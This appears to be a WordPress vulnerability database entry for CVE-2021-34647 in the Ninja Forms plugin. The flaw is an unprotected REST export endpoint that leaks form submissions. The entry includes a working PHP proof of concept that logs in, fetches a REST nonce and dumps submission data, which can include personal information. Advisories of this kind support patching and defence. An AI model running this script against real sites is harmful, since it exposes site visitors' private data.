WordPress Plugin Vulnerabilities

Ninja Forms < 3.5.8 - Unprotected REST-API to Sensitive Information Disclosure

Description

The plugin is vulnerable to sensitive information disclosure via the bulk_export_submissions function found in the ~/includes/Routes/Submissions.php file, in versions up to and including 3.5.7. This allows authenticated attackers to export all Ninja Forms submissions data via the /ninja-forms-submissions/export REST API which can include personally identifiable information.

Proof of Concept

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];

//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-json/ninja-forms-submissions/export?form_ids=2&start_date=162987000&end_date=1629871200');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Affects Plugins

Plugin icon
ninja-forms
Fixed in 3.5.8

References

CVE
CVE-2021-34647
URL
https://www.wordfence.com/blog/2021/09/recently-patched-vulnerabilities-in-ninja-forms-plugin-affects-over-1-million-site-owners/

Classification

Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
A3: Sensitive Data Exposure
CWE
CWE-200
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
Yes
WPVDB ID
606973aa-cf5d-43a7-9ef5-faa7f9af5318

Timeline

Publicly Published
2021-09-22 (about 2 years ago)
Added
2021-09-22 (about 2 years ago)
Last Updated
2023-02-03 (about 1 years ago)

Other

Published
Title
Published
2020-12-17
Title
ListingPro < 2.6.1 - Unauthenticated Sensitive Data Disclosure (Usernames, Emails etc)
Published
2023-10-09
Title
Image Regenerate & Select Crop < 7.3.1 - Sensitive Information Exposure
Published
2024-04-05
Title
User Spam Remover < 1.1 - Unauthenticated Sensitive Information Exposure
Published
2021-01-28
Title
uListing < 1.7 - Unauthenticated Information Disclosure
Published
2024-02-20
Title
Error Log Viewer < 1.1.3 - Directory Listing to Sensitive Data Exposure